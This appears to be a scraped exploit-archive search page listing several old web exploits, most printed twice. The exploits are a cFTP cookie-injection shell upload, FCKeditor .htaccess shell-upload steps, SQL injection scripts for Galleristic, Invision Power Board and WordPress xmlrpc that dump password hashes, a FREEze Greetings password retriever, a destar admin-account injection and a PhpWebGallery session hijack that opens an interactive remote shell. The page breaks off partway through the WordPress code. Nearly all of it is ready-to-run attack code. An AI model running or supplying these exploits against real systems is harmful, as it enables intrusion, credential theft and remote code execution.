no matching target
Search result for 'no matching target'
(0.0191071033478 seconds)
leviathan/cFTP <= 0.1 (r80) Arbitrary File Upload ( php)
<?php
# Exploit Title: cFTP <= 0.1 (r80) Arbitrary File Upload
# Date: 2011-07-29
# Author: leviathan (vulnerability discovered by Simon Leblanc : <https://code.google.com/p/clients-oriented-ftp/issues/detail?id=78>)
# Software Link: https://code.google.com/p/clients-oriented-ftp/downloads/list
# Version: 0.1
# Tested on: linux
// Vulnerable URL
$url = 'http://[url domain]/cFTP/';
// The file to upload
$filename = dirname(__FILE__).'/info.php';
$failext = array('php', 'pl');
$username = 'hackname'.rand(0, 999999);
$cookies_injection = 'access=admin; userlevel=9'; // <-- the big error of this app :-)
/**
* Call URL
*/
function curl_call_url($url, $cookies_injection, $inputs = null)
{
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_HEADER, false);
curl_setopt($curl, CURLOPT_POST, true);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($curl, CURLOPT_COOKIE, $cookies_injection);
if (is_array($inputs) === true) {
curl_setopt($curl, CURLOPT_POSTFIELDS, $inputs);
}
$response = curl_exec($curl);
$headers = curl_getinfo($curl);
$error_number = curl_errno($curl);
$error_message = curl_error($curl);
curl_close($curl);
return array($response, $headers, $error_number, $error_message);
}
// Add vulnerable extensions (php, pl : defined in $failext)
list($response, $headers, $error_number, $error_message) = curl_call_url($url.'options.php', $cookies_injection);
if (preg_match_all('/<input([^>]+)name="([^"]+)"([^>]+)value="([^"]+)([^>]*)>/', $response, $matches)) {
$input = array();
$count = count($matches[0]);
for ($i = 0; $i < $count; $i++) {
$input[$matches[2][$i]] = $matches[4][$i];
if ($matches[2][$i] === 'allowed_file_types') {
foreach ($failext as $ext) {
if (strpos($matches[4][$i], $ext) === false) {
$input[$matches[2][$i]] .= ','.$ext;
}
}
$input[$matches[2][$i]] = str_replace(',', '|', $input[$matches[2][$i]]);
}
}
// add select
if (preg_match('/<option selected="selected" value="([^"]+)"/', $response, $matches)) {
$input['timezone'] = $matches[1];
} else {
$input['timezone'] = 'America/Argentina/Buenos_Aires';
}
// Validate the form to add the vulnerables extensions
list($response, $headers, $error_number, $error_message) = curl_call_url($url.'options.php', $cookies_injection, $input);
if (strpos($response, 'message_ok') !== false) {
// Add new client : required to upload the file
$input = array(
'add_client_form_name' => $username,
'add_client_form_user' => $username,
'add_client_form_pass' => 'hackname',
'add_client_form_pass2' => 'hackname',
'add_client_form_address' => 'my address',
'add_client_form_phone' => '000-000-000',
//'add_client_form_notify' => '0',
'add_client_form_email' => $username.'@example.com',
'add_client_form_intcont' => '',
'Submit' => 'Create account',
);
list($response, $headers, $error_number, $error_message) = curl_call_url($url.'clientform.php', $cookies_injection, $input);
if (strpos($response, 'message_ok') !== false) {
// Now upload file :-)
$input = array(
'name' => 'my_hack_file',
'description' => 'It\'s my hack file',
'clientname' => $username,
'ufile' => '@'.$filename,
'Submit' => 'Upload',
);
list($response, $headers, $error_number, $error_message) = curl_call_url($url.'fileupload.php', $cookies_injection, $input);
if (preg_match('#<a href="([^"]+)">File uploaded correctly#', $response, $matches)) {
// get filename
list($response, $headers, $error_number, $error_message) = curl_call_url($url.$matches[1], $cookies_injection);
if (preg_match('#<a href="([^"]+)'.basename($filename).'" target="_blank"#', $response, $matches_end)) {
echo 'Your file is here : '.$url.$matches[1].$matches_end[1].basename($filename);
} else {
var_dump($response);
echo 'fail to hack : where is the file !!!';
}
} else {
var_dump($response);
echo 'fail to hack : file not uploaded';
}
} else {
var_dump($response);
echo 'fail to hack : client not created';
}
} else {
var_dump($response);
echo 'fail to hack : options not changed';
}
} else {
var_dump($response);
echo 'fail to hack : no input';
}
leviathan/cFTP 0.1 r80 Shell Upload ( na)
<?php
# Exploit Title: cFTP <= 0.1 (r80) Arbitrary File Upload
# Date: 2011-07-29
# Author: leviathan (vulnerability discovered by Simon Leblanc : <https://code.google.com/p/clients-oriented-ftp/issues/detail?id=78>)
# Software Link: https://code.google.com/p/clients-oriented-ftp/downloads/list
# Version: 0.1
# Tested on: linux
// Vulnerable URL
$url = 'http://[url domain]/cFTP/';
// The file to upload
$filename = dirname(__FILE__).'/info.php';
$failext = array('php', 'pl');
$username = 'hackname'.rand(0, 999999);
$cookies_injection = 'access=admin; userlevel=9'; // <-- the big error of this app :-)
/**
* Call URL
*/
function curl_call_url($url, $cookies_injection, $inputs = null)
{
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_HEADER, false);
curl_setopt($curl, CURLOPT_POST, true);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($curl, CURLOPT_COOKIE, $cookies_injection);
if (is_array($inputs) === true) {
curl_setopt($curl, CURLOPT_POSTFIELDS, $inputs);
}
$response = curl_exec($curl);
$headers = curl_getinfo($curl);
$error_number = curl_errno($curl);
$error_message = curl_error($curl);
curl_close($curl);
return array($response, $headers, $error_number, $error_message);
}
// Add vulnerable extensions (php, pl : defined in $failext)
list($response, $headers, $error_number, $error_message) = curl_call_url($url.'options.php', $cookies_injection);
if (preg_match_all('/<input([^>]+)name="([^"]+)"([^>]+)value="([^"]+)([^>]*)>/', $response, $matches)) {
$input = array();
$count = count($matches[0]);
for ($i = 0; $i < $count; $i++) {
$input[$matches[2][$i]] = $matches[4][$i];
if ($matches[2][$i] === 'allowed_file_types') {
foreach ($failext as $ext) {
if (strpos($matches[4][$i], $ext) === false) {
$input[$matches[2][$i]] .= ','.$ext;
}
}
$input[$matches[2][$i]] = str_replace(',', '|', $input[$matches[2][$i]]);
}
}
// add select
if (preg_match('/<option selected="selected" value="([^"]+)"/', $response, $matches)) {
$input['timezone'] = $matches[1];
} else {
$input['timezone'] = 'America/Argentina/Buenos_Aires';
}
// Validate the form to add the vulnerables extensions
list($response, $headers, $error_number, $error_message) = curl_call_url($url.'options.php', $cookies_injection, $input);
if (strpos($response, 'message_ok') !== false) {
// Add new client : required to upload the file
$input = array(
'add_client_form_name' => $username,
'add_client_form_user' => $username,
'add_client_form_pass' => 'hackname',
'add_client_form_pass2' => 'hackname',
'add_client_form_address' => 'my address',
'add_client_form_phone' => '000-000-000',
//'add_client_form_notify' => '0',
'add_client_form_email' => $username.'@example.com',
'add_client_form_intcont' => '',
'Submit' => 'Create account',
);
list($response, $headers, $error_number, $error_message) = curl_call_url($url.'clientform.php', $cookies_injection, $input);
if (strpos($response, 'message_ok') !== false) {
// Now upload file :-)
$input = array(
'name' => 'my_hack_file',
'description' => 'It\'s my hack file',
'clientname' => $username,
'ufile' => '@'.$filename,
'Submit' => 'Upload',
);
list($response, $headers, $error_number, $error_message) = curl_call_url($url.'fileupload.php', $cookies_injection, $input);
if (preg_match('#<a href="([^"]+)">File uploaded correctly#', $response, $matches)) {
// get filename
list($response, $headers, $error_number, $error_message) = curl_call_url($url.$matches[1], $cookies_injection);
if (preg_match('#<a href="([^"]+)'.basename($filename).'" target="_blank"#', $response, $matches_end)) {
echo 'Your file is here : '.$url.$matches[1].$matches_end[1].basename($filename);
} else {
var_dump($response);
echo 'fail to hack : where is the file !!!';
}
} else {
var_dump($response);
echo 'fail to hack : file not uploaded';
}
} else {
var_dump($response);
echo 'fail to hack : client not created';
}
} else {
var_dump($response);
echo 'fail to hack : options not changed';
}
} else {
var_dump($response);
echo 'fail to hack : no input';
}
cFTP versions 0.1 r80 and below suffer from a shell upload vulnerability.
pentesters.ir/FCKeditor all versian Arbitrary File Upload Vulnerability ( php)
In The Name Of GOD [+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability [+] Date: 2011 [+] script:http://sourceforge.net/projects/fckeditor/ [+] Author : pentesters.ir [+] Website : WwW.PenTesters.IR --------------------------------------------------------- 1.create a htaccess file: code: <FilesMatch "_php.gif"> SetHandler application/x-httpd-php </FilesMatch> 2.Now upload this htaccess with FCKeditor. http://target.com/FCKeditor/editor/filemanager/upload/test.html http://target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html ---------------------------------------------------------------------------------------------- 3.Now upload shell.php.gif with FCKeditor. 4.After upload shell.php.gif, the name "shell.php.gif" change to "shell_php.gif" automatically. 5.http://target.com/anything/shell_php.gif 6.Now shell is available from server. ---------------------------------------------------------
Pentesters.ir/FCKeditor Shell Upload ( na)
In The Name Of GOD [+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability [+] Date: 2011 [+] script:http://sourceforge.net/projects/fckeditor/ [+] Author : pentesters.ir [+] Website : WwW.PenTesters.IR --------------------------------------------------------- 1.create a htaccess file: code: <FilesMatch "_php.gif"> SetHandler application/x-httpd-php </FilesMatch> 2.Now upload this htaccess with FCKeditor. http://target.com/FCKeditor/editor/filemanager/upload/test.html http://target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html ---------------------------------------------------------------------------------------------- 3.Now upload shell.php.gif with FCKeditor. 4.After upload shell.php.gif, the name "shell.php.gif" change to "shell_php.gif" automatically. 5.http://target.com/anything/shell_php.gif 6.Now shell is available from server. ---------------------------------------------------------
FCKeditor suffers from a shell upload vulnerability when a specially crafted htaccess file is used.
cOndemned/Galleristic 1.0 (index.php cat) Remote SQL Injection Exploit ( php)
<?php
#
# Name : Galleristic v1.0 (index.php cat) Remote SQL Injection Exploit
# Author : cOndemned
# Note : works only when magic_quotes_gpc = off
# Greetz : irk4z, GregStar, ZaBeaTy, Iwan, ElusiveN, doctor, Avantura ;*
#
function exploit($target, $v) {
$injection = "/index.php?cat='-1+union+select+value+from+gallery_settings+where+id=" . $v . "/*";
$request = file($target . $injection);
for($i = 0; $i < count($request); $i++) {
preg_match('/\'(.*)\'<\/h2>/', $request[$i], $response);
if(!empty($response[1])) {
return $response[1] . '<br />';
}
}
}
# Usage : Run in a browser as : http://[yourbox]/exploit.php?target=http://[targetbox]/[path]/
if(empty($_GET['target'])) {
die('No target site specified!');
}
else {
for($c = 1; $c < 3; $c++) {
echo exploit($_GET['target'], $c);
}
}
?>
# milw0rm.com [2008-05-07]
cOndemned/galleristic-sql.txt ( na)
<?php
#
# Name : Galleristic v1.0 (index.php cat) Remote SQL Injection Exploit
# Author : cOndemned
# Note : works only when magic_quotes_gpc = off
# Greetz : irk4z, GregStar, ZaBeaTy, Iwan, ElusiveN, doctor, Avantura ;*
#
function exploit($target, $v) {
$injection = "/index.php?cat='-1+union+select+value+from+gallery_settings+where+id=" . $v . "/*";
$request = file($target . $injection);
for($i = 0; $i < count($request); $i++) {
preg_match('/\'(.*)\'<\/h2>/', $request[$i], $response);
if(!empty($response[1])) {
return $response[1] . '<br />';
}
}
}
# Usage : Run in a browser as : http://[yourbox]/exploit.php?target=http://[targetbox]/[path]/
if(empty($_GET['target'])) {
die('No target site specified!');
}
else {
for($c = 1; $c < 3; $c++) {
echo exploit($_GET['target'], $c);
}
}
?>
Galleristic version 1.0 remote SQL injection exploit that makes use of index.php.
n/a/Invision Power Board <= 1.3.1 Login.PHP SQL Injection (working) ( php)
<?php
/*
<= 1.3.1 Final
/str0ke
*/
$server = "SERVER";
$port = 80;
$file = "PATH";
$target = 81;
/* User id and password used to fake-logon are not important. '10' is a
random number. */
$id = 10;
$pass = "";
$hex = "0123456789abcdef";
for($i = 1; $i <= 32; $i++ ) {
$idx = 0;
$found = false;
while( !($found) ) {
$letter = substr($hex, $idx, 1);
/* %2527 translates to %27, which gets past magic quotes.
This is translated to ' by urldecode. */
$cookie =
"member_id=$id;pass_hash=$pass%2527%20OR%20id=$target";
$cookie .=
"%20HAVING%20id=$target%20AND%20MID(`password`,$i,1)=%2527" . $letter;
/* Query is in effect: SELECT * FROM ibf_members
WHERE id=$id AND password='$pass' OR
id=$target
HAVING id=$target AND
MID(`password`,$i,1)='$letter' */
$header = getHeader($server, $port, $file .
"index.php?act=Login&CODE=autologin", $cookie);
if( !preg_match('/Location:(.*)act\=Login\&CODE\=00\r\n/',
$header) ) {
echo $i . ": " . $letter . "\n";
$found = true;
$hash .= $letter;
} else {
$idx++;
}
}
}
echo "\n\nFinal Hash: $hash\n";
function getHeader($server, $port, $file, $cookie) {
$ip = gethostbyname($server);
$fp = fsockopen($ip, $port);
if (!$fp) {
return "Unknown";
} else {
$com = "HEAD $file HTTP/1.1\r\n";
$com .= "Host: $server:$port\r\n";
$com .= "Cookie: $cookie\r\n";
$com .= "Connection: close\r\n";
$com .= "\r\n";
fputs($fp, $com);
do {
$header.= fread($fp, 512);
} while( !preg_match('/\r\n\r\n$/',$header) );
}
return $header;
}
?>
// milw0rm.com [2005-06-08]
/invision.php.txt ( na)
<?php
/*
<= 2.0.3
<= 1.3.1 Final
/str0ke
*/
$server = "SERVER";
$port = 80;
$file = "PATH";
$target = 81;
/* User id and password used to fake-logon are not important. '10' is a
random number. */
$id = 10;
$pass = "";
$hex = "0123456789abcdef";
for($i = 1; $i <= 32; $i++ ) {
$idx = 0;
$found = false;
while( !($found) ) {
$letter = substr($hex, $idx, 1);
/* %2527 translates to %27, which gets past magic quotes.
This is translated to ' by urldecode. */
$cookie =
"member_id=$id;pass_hash=$pass%2527%20OR%20id=$target";
$cookie .=
"%20HAVING%20id=$target%20AND%20MID(`password`,$i,1)=%2527" . $letter;
/* Query is in effect: SELECT * FROM ibf_members
WHERE id=$id AND password='$pass' OR
id=$target
HAVING id=$target AND
MID(`password`,$i,1)='$letter' */
$header = getHeader($server, $port, $file .
"index.php?act=Login&CODE=autologin", $cookie);
if( !preg_match('/Location:(.*)act\=Login\&CODE\=00\r\n/',
$header) ) {
echo $i . ": " . $letter . "\n";
$found = true;
$hash .= $letter;
} else {
$idx++;
}
}
}
echo "\n\nFinal Hash: $hash\n";
function getHeader($server, $port, $file, $cookie) {
$ip = gethostbyname($server);
$fp = fsockopen($ip, $port);
if (!$fp) {
return "Unknown";
} else {
$com = "HEAD $file HTTP/1.1\r\n";
$com .= "Host: $server:$port\r\n";
$com .= "Cookie: $cookie\r\n";
$com .= "Connection: close\r\n";
$com .= "\r\n";
fputs($fp, $com);
do {
$header.= fread($fp, 512);
} while( !preg_match('/\r\n\r\n$/',$header) );
}
return $header;
}
?>
Invision Power Board versions 2.0.3 and below Login.PHP SQL injection exploit.
cOndemned/FREEze Greetings 1.0 Remote Password Retrieve Exploit ( php)
<?php
/**
* FREEze Greetings 1.0 Remote Password Retrieve Exploit
* Exploit by cOndemned
*
* Greetz : suN8Hclf, 0in, m4r1usz, str0ke, rtgn, doctor, sid.psycho [...]
* Special thx to ZaBeaTy for developing such a sexy regexp ;) Thx m8
*/
echo <<< Header
[~] FREEze Greetings 1.0 Remote Password Retrieve Exploit
[~] Exploit by cOndemned [ Prints decoded admin password ]
Header;
if($argc != 2) printf("[~] Usage : php %s <target_with_path>\r\n\r\n", $argv[0]) and exit;
$out = (preg_match('!^([^ ]+)$!sei', file_get_contents($argv[1] . '/pwd.txt'), $r) && preg_match('!^([^\|\|]+)\|\|!sei', base64_decode($r[1]), $pass))
? sprintf("Password : %s", base64_decode($pass[1])) : 'Exploitation failed';
printf("[~] %s \r\n\r\n", $out);
?>
# milw0rm.com [2008-11-17]
cOndemned/freezegreetings-password.txt ( na)
<?php
/**
* FREEze Greetings 1.0 Remote Password Retrieve Exploit
* Exploit by cOndemned
*
* Greetz : suN8Hclf, 0in, m4r1usz, str0ke, rtgn, doctor, sid.psycho [...]
* Special thx to ZaBeaTy for developing such a sexy regexp ;) Thx m8
*/
echo <<< Header
[~] FREEze Greetings 1.0 Remote Password Retrieve Exploit
[~] Exploit by cOndemned [ Prints decoded admin password ]
Header;
if($argc != 2) printf("[~] Usage : php %s <target_with_path>\r\n\r\n", $argv[0]) and exit;
$out = (preg_match('!^([^ ]+)$!sei', file_get_contents($argv[1] . '/pwd.txt'), $r) && preg_match('!^([^\|\|]+)\|\|!sei', base64_decode($r[1]), $pass))
? sprintf("Password : %s", base64_decode($pass[1])) : 'Exploitation failed';
printf("[~] %s \r\n\r\n", $out);
?>
FREEze Greetings version 1.0 remote password retrieval exploit.
nonroot/destar 0.2.2-5 Arbitrary Add Admin User Exploit ( php)
#
#!/usr/bin/python
#
# Exploit for destar 0.2.2-5, tested on Linux Debian
#
# Bug found and exploit coded by a non root user
# http://nonroot.blogspot.com/
#
# Enero 2008
#
# This is a PoC, please use it just for learning how to exploit something
#
# use: $python ./exploit_code.py
#
# required: urllib, sys and re
#
import urllib
import sys,re
print "Target host: i.e: http://127.0.0.1:8080/"
host=raw_input("Target host ( include http and /): ")
user=raw_input("A normal user for destar:")
password=raw_input("A normal password for destar:")
null=""
print "trying ..."
loggin = urllib.urlencode({'name': user, 'pw': password})
attack = urllib.urlencode({'cfim': null, 'cfbs': null, 'cfto': null, 'dsec' : '45', 'vmim' : 'yes','vmbs' : 'yes', 'vmu' : 'yes', 'pin' : '1234,) ; CfgOptUser(name="theroot",secret="theroot",pc="200.75.43.187",phone="agent1",pbx="pbx1",level="4",language="en",) ; CfgPhoneSip(pbx="pbx1000",name="OpenBSD-Agent",secret="imsecure",ext= "2999",dtmfmode = "rfc2833",enablecallgroup = True,callgroup = "1",queues="queue1",panel= True' })
response= urllib.urlopen(host+"login/", loggin)
data=response.read()
lookup=re.compile("'User'").search
match=lookup(data)
if match:
print user,"logged, now trying exploit"
else:
print "Password invalid, try again."
sys.exit(2)
response= urllib.urlopen(host+"user/settings/", attack)
if response:
print "ok, attack was done, now i will try loggin like 'theroot'"
user='theroot'
password='theroot'
loggin = urllib.urlencode({'name': user, 'pw': password})
response= urllib.urlopen(host+"login/", loggin)
data=response.read()
lookup=re.compile("'Programmer'").search
match=lookup(data)
if match:
print "Exploit ok. try: ",host+"/user/info"
else:
print "Exploit failed, sorry, maybe you need that the sysadmin restart destar, be patient!"
sys.exit(2)
else:
print "Exploit failed, sorry, go and find some new bug or check this code and fix it!"
sys.exit(2)
# milw0rm.com [2008-03-24]
EgiX/PhpWebGallery <= 1.7.2 Session Hijacking / Code Execution Exploit ( php)
<?php
/*
------------------------------------------------------------------------
PhpWebGallery <= 1.7.2 Remote Session Hijacking / Code Execution Exploit
------------------------------------------------------------------------
author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com
link.....: http://www.phpwebgallery.net/
details..: works with at least two rows in _comments table
This PoC was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
[-] vulnerable code in /plugins/event_tracer/event_list.php
60. $sort= isset($_GET['sort']) ? $_GET['sort'] : 1;
61. usort(
62. $events,
63. create_function( '$a,$b', 'return $a['.$sort.']>$b['.$sort.'];' )
64. );
An attacker could be able to inject and execute PHP code through $_GET['sort'], that is passed
to create_function() at line 63 (see http://www.securityfocus.com/bid/31398). Only admin can
access to the plugins management interface, but the attacker might be able to retrieve a valid
admin session id using the SQL injection bug in comments.php (see lines 325-340)
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout",5);
define(STDIN, fopen("php://stdin", "r"));
define(PATTERN, "/<span class=\"author\">(.*)<\/span> -/");
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...\n";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
function check_target()
{
global $host, $path, $prefix, $default_record;
$packet = "GET {$path}comments.php?sort_by=%s HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: pwg_id=".md5("foo")."\r\n";
$packet .= "Connection: close\r\n\r\n";
preg_match("/FROM (.*)image_category/", http_send($host, sprintf($packet, "foo")), $match);
$prefix = $match[1];
preg_match(PATTERN, http_send($host, sprintf($packet, "id/**/LIMIT/**/1/*")), $match);
$default_record = $match[1];
preg_match(PATTERN, http_send($host, sprintf($packet, "author/**/LIMIT/**/1/*")), $match);
if (!strlen($default_record) || $default_record == $match[1]) die("\n[-] Exploit failed...\n");
}
function encodeSQL($sql)
{
for ($i = 0, $n = strlen($sql); $i < $n; $i++) $encoded .= dechex(ord($sql[$i]));
return "CONCAT(0x{$encoded})";
}
function get_sid()
{
global $host, $path, $prefix, $default_record;
$chars = array_merge(array(0), range(48, 57), range(97, 102)); // 0-9 a-z
$index = 1;
$sid = "";
$packet = "GET {$path}comments.php?sort_by=%s HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: pwg_id=".md5("foo")."\r\n";
$packet .= "Connection: close\r\n\r\n";
print "\n[-] Fetching admin SID: ";
while (!strpos($sid, chr(0)))
{
for ($i = 0, $n = count($chars); $i <= $n; $i++)
{
if ($i == $n) die("\n\n[-] Exploit failed...try later!\n");
$sql = "(SELECT/**/IF(ASCII(SUBSTR(id,{$index},1))={$chars[$i]},author,id)/**/FROM/**/{$prefix}sessions".
"/**/WHERE/**/data/**/LIKE/**/".encodeSQL("pwg_uid|i:1;")."/**/LIMIT/**/1)/**/LIMIT/**/1/*";
preg_match(PATTERN, http_send($host, sprintf($packet, $sql)), $match);
if ($match[1] != $default_record) { $sid .= chr($chars[$i]); print chr($chars[$i]); break; }
}
$index++;
}
print "\n";
return $sid;
}
function check_plugin()
{
global $host, $path, $sid;
$packet = "GET {$path}%s HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: pwg_id={$sid}\r\n";
$packet .= "Connection: close\r\n\r\n";
// check if the event_tracer plugin isn't installed
if (preg_match("/not active/", http_send($host, sprintf($packet, "admin.php?page=plugin§ion=event_tracer/event_list.php"))))
{
http_send($host, sprintf($packet, "admin.php?page=plugins&plugin=event_tracer&action=install"));
http_send($host, sprintf($packet, "admin.php?page=plugins&plugin=event_tracer&action=activate"));
}
}
print "\n+---------------------------------------------------------------------------+";
print "\n| PhpWebGallery <= 1.7.2 Session Hijacking / Code Execution Exploit by EgiX |";
print "\n+---------------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage...: php $argv[0] host path [sid]\n";
print "\nhost....: target server (ip/hostname)";
print "\npath....: path to PhpWebGallery directory";
print "\nsid.....: a valid admin session id\n";
die();
}
$host = $argv[1];
$path = $argv[2];
check_target();
$sid = (isset($argv[3])) ? $argv[3] : get_sid();
check_plugin();
$code = "0];}error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die;%%23";
$packet = "GET {$path}admin.php?page=plugin§ion=event_tracer/event_list.php&sort={$code} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: pwg_id={$sid}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
while(1)
{
print "\nphpwebgallery-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$response = http_send($host, sprintf($packet, base64_encode($cmd)));
preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed...\n");
}
else break;
}
?>
# milw0rm.com [2008-10-14]
EgiX/phpwebgallery-hijackexec.txt ( na)
<?php
/*
------------------------------------------------------------------------
PhpWebGallery <= 1.7.2 Remote Session Hijacking / Code Execution Exploit
------------------------------------------------------------------------
author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com
link.....: http://www.phpwebgallery.net/
details..: works with at least two rows in _comments table
This PoC was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
[-] vulnerable code in /plugins/event_tracer/event_list.php
60. $sort= isset($_GET['sort']) ? $_GET['sort'] : 1;
61. usort(
62. $events,
63. create_function( '$a,$b', 'return $a['.$sort.']>$b['.$sort.'];' )
64. );
An attacker could be able to inject and execute PHP code through $_GET['sort'], that is passed
to create_function() at line 63 (see http://www.securityfocus.com/bid/31398). Only admin can
access to the plugins management interface, but the attacker might be able to retrieve a valid
admin session id using the SQL injection bug in comments.php (see lines 325-340)
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout",5);
define(STDIN, fopen("php://stdin", "r"));
define(PATTERN, "/<span class=\"author\">(.*)<\/span> -/");
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...\n";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
function check_target()
{
global $host, $path, $prefix, $default_record;
$packet = "GET {$path}comments.php?sort_by=%s HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: pwg_id=".md5("foo")."\r\n";
$packet .= "Connection: close\r\n\r\n";
preg_match("/FROM (.*)image_category/", http_send($host, sprintf($packet, "foo")), $match);
$prefix = $match[1];
preg_match(PATTERN, http_send($host, sprintf($packet, "id/**/LIMIT/**/1/*")), $match);
$default_record = $match[1];
preg_match(PATTERN, http_send($host, sprintf($packet, "author/**/LIMIT/**/1/*")), $match);
if (!strlen($default_record) || $default_record == $match[1]) die("\n[-] Exploit failed...\n");
}
function encodeSQL($sql)
{
for ($i = 0, $n = strlen($sql); $i < $n; $i++) $encoded .= dechex(ord($sql[$i]));
return "CONCAT(0x{$encoded})";
}
function get_sid()
{
global $host, $path, $prefix, $default_record;
$chars = array_merge(array(0), range(48, 57), range(97, 102)); // 0-9 a-z
$index = 1;
$sid = "";
$packet = "GET {$path}comments.php?sort_by=%s HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: pwg_id=".md5("foo")."\r\n";
$packet .= "Connection: close\r\n\r\n";
print "\n[-] Fetching admin SID: ";
while (!strpos($sid, chr(0)))
{
for ($i = 0, $n = count($chars); $i <= $n; $i++)
{
if ($i == $n) die("\n\n[-] Exploit failed...try later!\n");
$sql = "(SELECT/**/IF(ASCII(SUBSTR(id,{$index},1))={$chars[$i]},author,id)/**/FROM/**/{$prefix}sessions".
"/**/WHERE/**/data/**/LIKE/**/".encodeSQL("pwg_uid|i:1;")."/**/LIMIT/**/1)/**/LIMIT/**/1/*";
preg_match(PATTERN, http_send($host, sprintf($packet, $sql)), $match);
if ($match[1] != $default_record) { $sid .= chr($chars[$i]); print chr($chars[$i]); break; }
}
$index++;
}
print "\n";
return $sid;
}
function check_plugin()
{
global $host, $path, $sid;
$packet = "GET {$path}%s HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: pwg_id={$sid}\r\n";
$packet .= "Connection: close\r\n\r\n";
// check if the event_tracer plugin isn't installed
if (preg_match("/not active/", http_send($host, sprintf($packet, "admin.php?page=plugin&section=event_tracer/event_list.php"))))
{
http_send($host, sprintf($packet, "admin.php?page=plugins&plugin=event_tracer&action=install"));
http_send($host, sprintf($packet, "admin.php?page=plugins&plugin=event_tracer&action=activate"));
}
}
print "\n+---------------------------------------------------------------------------+";
print "\n| PhpWebGallery <= 1.7.2 Session Hijacking / Code Execution Exploit by EgiX |";
print "\n+---------------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage...: php $argv[0] host path [sid]\n";
print "\nhost....: target server (ip/hostname)";
print "\npath....: path to PhpWebGallery directory";
print "\nsid.....: a valid admin session id\n";
die();
}
$host = $argv[1];
$path = $argv[2];
check_target();
$sid = (isset($argv[3])) ? $argv[3] : get_sid();
check_plugin();
$code = "0];}error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die;%%23";
$packet = "GET {$path}admin.php?page=plugin&section=event_tracer/event_list.php&sort={$code} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: pwg_id={$sid}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
while(1)
{
print "\nphpwebgallery-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$response = http_send($host, sprintf($packet, base64_encode($cmd)));
preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed...\n");
}
else break;
}
?>
PHP Web Gallery versions 1.7.2 and below session hijacking and code execution exploit.
Slappter/Wordpress 2.2 (xmlrpc.php) Remote SQL Injection Exploit ( php)
/*
El error, bastante tonto por cierto, se encuentra en la función wp_suggestCategories, en el archivo xmlrpc.php:
function wp_suggestCategories($args) {
global $wpdb;
$this->escape($args);
$blog_id = (int) $args[0];
$username = $args[1];
$password = $args[2];
$category = $args[3];
$max_results = $args[4];
if(!$this->login_pass_ok($username, $password)) {
return($this->error);
}
// Only set a limit if one was provided.
$limit = "";
if(!empty($max_results)) {
$limit = "LIMIT {$max_results}";
}
$category_suggestions = $wpdb->get_results("
SELECT cat_ID category_id,
cat_name category_name
FROM {$wpdb->categories}
WHERE cat_name LIKE '{$category}%'
{$limit}
");
return($category_suggestions);
}
Como se puede observar en la porción de código, no se hace una conversión a entero del valor de $max_results, por lo que es posible enviar valores del tipo 0 UNION ALL SELECT user_login, user_pass FROM wp_users. Para que un atacante logre su objetivo, es necesario que éste tenga una cuenta de usuario válida (una cuenta de tipo suscriber basta y sobra) en el sitio vÃctima.
Preparé un pequeño exploit (Creditos: Alex) que devuelve la lista de usuarios con sus respectivas contraseñas en MD5, además también incluye las cookies de autenticación para cada usuario.
Credits: Alex de la Concha
code c sharp:
*/
using System;
using System.Net;
using System.Text;
using System.Xml;
using System.Text.RegularExpressions;
using System.Security.Cryptography;
class Program
{
static void Main(string[] args)
{
string targetUrl = "http://localhost/wp/";
string login = "alex";
string password = "1234";
string data = @"<methodCall>
<methodName>wp.suggestCategories</methodName>
<params>
<param><value>1</value></param>
<param><value>{0}</value></param>
<param><value>{1}</value></param>
<param><value>1</value></param>
<param><value>0 UNION ALL SELECT user_login, user_pass FROM {2}users</value></param>
</params>
</methodCall>";
string cookieHash = GetCookieHash(targetUrl);
